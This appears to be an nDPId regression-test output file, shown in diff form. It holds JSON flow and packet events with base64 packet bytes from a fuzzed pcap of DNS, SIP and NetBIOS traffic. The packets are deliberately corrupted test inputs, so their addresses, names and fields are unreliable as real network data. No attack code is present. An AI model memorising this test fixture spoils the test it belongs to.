00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":452,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470509449,"flow_last_seen":1120470509449,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470509449,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"240.168.1.2","src_port":53,"dst_port":2792,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":452,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":1,"flow_last_seen":1120470509449,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470509449,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEB8KgBAgA1CugAR8ZmQOyAAABkAAEAAAAAATEBMAEwAzEyNwdpbi1hGmRyBGFycGEAAFcAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":452,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":1,"flow_last_seen":1120470509449,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470509449,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEB8KgBAgA1CugAR8ZmQOyAAABkAAEAAAAAATEBMAEwAzEyNwdpbi1hGmRyBGFycGEAAFcAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":452,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470509449,"flow_last_seen":1120470509449,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470509449,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"240.168.1.2","src_port":53,"dst_port":2792,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-a?dr.arpa","num_queries":100,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":452,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470509449,"flow_last_seen":1120470509449,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470509449,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"240.168.1.2","src_port":53,"dst_port":2792,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-a?dr.arpa","num_queries":100,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
01011{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":454,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":532,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":532,"pkt_l4_len":0,"thread_ts_msec":1120470509450,"pkt":"AODtAW69ADBUADRWCABFAEMGAABAADcRiifU8iEjwKgBAhPEE8QB8vKXU0lQLzIuMCA0MDEgbm9uY2UgaGFzIGNoYW5nZWQNCkNhbGwtSUQ6IDU3ODIyMjcyOS00NjY1ZDc3NUA1NzgyMjI3MzItNDY2NWQ3NzINCkNTZXE6IDc5IFJFR0lTVEVSDQpGcm9tOiA8c2lwOjM1MTA0NzIzQHNpcC5jeWJlcmNpdHkuZGs+O3RhZz0zNzBkOGU1DQpUbzogPHNpcDozNTEwNDcyM2pzaXAuY3liZSljaXR5LmRrPjt0YWc9MDAtMDQwODMtMTcwMWI2ZGQtMDUxZjVkYzMxDQpWaWE6IFNJUC8yLjAvVURQIDE5Mi4xNo4uMS4yO3JlY2VpdmVkPTgwLjIzMC4yMTUuNzA7cnBvcnQ9NTA2MDticmFuY2g9ejloRzRiS25wNTc3MjYxOTctNDg0MWM3Y2QxOTIuMTY4LjEuMvQKV1dXLUF1dGhlbnRpY2F0ZTogRGlnZXN0IHJlYWxtPSJzaXAuY3lzZXJjaXR5LmRrIixub25jZT0iMTcwMWI2Y2MxY2JjOTBkMzI4ZmUxZjFhMzFhMmM0ZSIsb3BhcXVlPSIxNzAxYTEzNTFmNzA3OTUiLHN0YWxlPWZhbHNlLGFsZ29yaXRobT1NRDUNCkNvbnRlbnQtTGVuZ3RoOiAwDQoNCg=="} 00997{"packet_event_id":1,"packet_event_name":"packet","packet_id":454,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":532,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":532,"pkt_l4_len":0,"thread_ts_msec":1120470509450,"pkt":"AODtAW69ADBUADRWCABFAEMGAABAADcRiifU8iEjwKgBAhPEE8QB8vKXU0lQLzIuMCA0MDEgbm9uY2UgaGFzIGNoYW5nZWQNCkNhbGwtSUQ6IDU3ODIyMjcyOS00NjY1ZDc3NUA1NzgyMjI3MzItNDY2NWQ3NzINCkNTZXE6IDc5IFJFR0lTVEVSDQpGcm9tOiA8c2lwOjM1MTA0NzIzQHNpcC5jeWJlcmNpdHkuZGs+O3RhZz0zNzBkOGU1DQpUbzogPHNpcDozNTEwNDcyM2pzaXAuY3liZSljaXR5LmRrPjt0YWc9MDAtMDQwODMtMTcwMWI2ZGQtMDUxZjVkYzMxDQpWaWE6IFNJUC8yLjAvVURQIDE5Mi4xNo4uMS4yO3JlY2VpdmVkPTgwLjIzMC4yMTUuNzA7cnBvcnQ9NTA2MDticmFuY2g9ejloRzRiS25wNTc3MjYxOTctNDg0MWM3Y2QxOTIuMTY4LjEuMvQKV1dXLUF1dGhlbnRpY2F0ZTogRGlnZXN0IHJlYWxtPSJzaXAuY3lzZXJjaXR5LmRrIixub25jZT0iMTcwMWI2Y2MxY2JjOTBkMzI4ZmUxZjFhMzFhMmM0ZSIsb3BhcXVlPSIxNzAxYTEzNTFmNzA3OTUiLHN0YWxlPWZhbHNlLGFsZ29yaXRobT1NRDUNCkNvbnRlbnQtTGVuZ3RoOiAwDQoNCg=="}
00231{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":454,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":498,"global_ts_msec":1120470509599} 00217{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":454,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":498,"global_ts_msec":1120470509599}
00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":455,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1120469572981,"flow_last_seen":1120470509450,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":11994,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":1120470509450,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":455,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1120469572981,"flow_last_seen":1120470509450,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":11994,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":1120470509450,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
00594{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":455,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470327552,"flow_last_seen":1120470336558,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470509450,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00594{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":455,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470327552,"flow_last_seen":1120470336558,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470509450,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470332553,"flow_last_seen":1120470332553,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470542975,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.184.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470332553,"flow_last_seen":1120470332553,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470542975,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.184.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -884,8 +884,8 @@
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470385615,"flow_last_seen":1120470394622,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470590283,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2776,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470385615,"flow_last_seen":1120470394622,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470590283,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2776,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470402625,"flow_last_seen":1120470402625,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470590283,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2782,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470402625,"flow_last_seen":1120470402625,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470590283,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2782,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402624,"flow_last_seen":1120470402624,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470590283,"l3_proto":"ip4","src_ip":"192.168.33.2","dst_ip":"192.168.1.1","src_port":2782,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402624,"flow_last_seen":1120470402624,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470590283,"l3_proto":"ip4","src_ip":"192.168.33.2","dst_ip":"192.168.1.1","src_port":2782,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00430{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120470590283,"pkt":"\/\/\/\/\/\/\/\/AODtAW5LCABFAJxOa4EAAIARSszAqAECwKgB\/wCJAIkAOltZhUIBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFTkVPYkFDQUNBekFDQUJNAAAgAAE="} 00416{"packet_event_id":1,"packet_event_name":"packet","packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120470590283,"pkt":"\/\/\/\/\/\/\/\/AODtAW5LCABFAJxOa4EAAIARSszAqAECwKgB\/wCJAIkAOltZhUIBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFTkVPYkFDQUNBekFDQUJNAAAgAAE="}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":58,"global_ts_msec":1120470636050} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":58,"global_ts_msec":1120470636050}
00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456286,"flow_last_seen":1120470456286,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1120470637551,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":9587,"dst_port":196,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456286,"flow_last_seen":1120470456286,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1120470637551,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":9587,"dst_port":196,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00598{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456286,"flow_last_seen":1120470456286,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1120470637551,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":9587,"dst_port":196,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00598{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456286,"flow_last_seen":1120470456286,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1120470637551,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":9587,"dst_port":196,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470033172,"flow_last_seen":1120470033172,"flow_idle_time":600000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1120470637551,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","l4_proto":240,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470033172,"flow_last_seen":1120470033172,"flow_idle_time":600000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1120470637551,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","l4_proto":240,"ndpi": {"proto":"Unknown","breed":"Unrated"}}
@@ -919,8 +919,8 @@
00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":2,"flow_last_seen":1120470662812,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470662812,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAABOXMUAAIARWWHAqAEpwKgB\/wCJAIkAOGggkVIBEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUM1Q0FDQUNBQ0FDQUJMAAAgAAE="} 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":2,"flow_last_seen":1120470662812,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470662812,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAABOXMUAAIARWWHAqAEpwKgB\/wCJAIkAOGggkVIBEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUM1Q0FDQUNBQ0FDQUJMAAAgAAE="}
00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":3,"flow_last_seen":1120470663563,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470663563,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAABOXMYAAIARWWDAqAEpwKgB\/wCJAIkAOmggkVIBEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJMAAAgAAE="} 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":3,"flow_last_seen":1120470663563,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470663563,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAABOXMYAAIARWWDAqAEpwKgB\/wCJAIkAOmggkVIBEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJMAAAgAAE="}
00692{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":3,"flow_last_seen":1120470666317,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1120470666317,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAADKXMcAAIARWOPAqAEpwKgB\/wCKAIoAtl+rEQKRU8CoASkAigCgAAAgRU1FQkVDREJEQkRCQ0FDQUNBQ0FDQUNBQ0FDQUNBQUEQIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAABMAAAAAAAAAAAAEQAABgAAQAAAAAAAAOgDAAAAAAAAAAAGAFYAAwABAAEAAgAXAFxNQUlMU0xPVFxCUk9XU0UACQTYAM8A"} 00692{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":3,"flow_last_seen":1120470666317,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1120470666317,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAADKXMcAAIARWOPAqAEpwKgB\/wCKAIoAtl+rEQKRU8CoASkAigCgAAAgRU1FQkVDREJEQkRCQ0FDQUNBQ0FDQUNBQ0FDQUNBQUEQIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAABMAAAAAAAAAAAAEQAABgAAQAAAAAAAAOgDAAAAAAAAAAAGAFYAAwABAAEAAgAXAFxNQUlMU0xPVFxCUk9XU0UACQTYAM8A"}
00430{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":474,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120470666318,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAFJOXMkAAIARWV3A6AEpwKgB\/wCJAIkAOmgdkVUBEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJMAAAgAAE="} 00416{"packet_event_id":1,"packet_event_name":"packet","packet_id":474,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120470666318,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAFJOXMkAAIARWV3A6AEpwKgB\/wCJAIkAOmgdkVUBEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJMAAAgAAE="}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":474,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":58,"global_ts_msec":1120470667069} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":474,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":58,"global_ts_msec":1120470667069}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":475,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470457512,"flow_last_seen":1120470465524,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470666318,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2787,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":475,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470457512,"flow_last_seen":1120470465524,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470666318,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2787,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
